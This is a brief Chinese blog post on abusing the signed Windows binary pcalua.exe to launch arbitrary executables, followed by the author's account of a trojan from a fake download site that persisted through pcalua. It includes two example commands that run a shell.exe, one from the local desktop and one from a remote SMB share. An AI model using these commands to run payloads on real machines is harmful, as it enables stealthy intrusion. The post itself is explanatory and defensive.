pcalua.exe是程序兼容性助手(ProgramCompatibilityAssistant)的组件,位于C:\Windows\System32\,由Microsoft签名,包含在系统PATH环境变量中。它用于以兼容模式运行程序,但可被滥用通过-a参数直接执行任意可执行文件,包括本地或远程文件。
本地加载:
pcalua -m -a C:\Users\<username>\Desktop\shell.exe
远程加载:
pcalua -m -a \\192.168.126.146\share\shell.exe
网上有大量伪装各种软件官方站点的木马站点,他们通过购买搜索引擎关键字排名,使得自己的伪装站点在搜索页面靠前,很多人不小心误下载,就会中招。这不,一不留神也被挂了,点击安装后无反应,感觉不对劲,立刻把可疑程序放到沙盘中测试,进而找到其解包路径,再去指定路径下 将近期(当天)的新增目录都删除,实际是C:\ProgramData目录下。由于没再发现有其他可疑路径,就没继续研究,比如启动项在哪儿,也没去管。第二天发现系统提示pcalua找不到xxx文件(前一天删除的),才查了一下,原来如此。
不知道都是哪些人在做这种。。。
评论0
暂时没有评论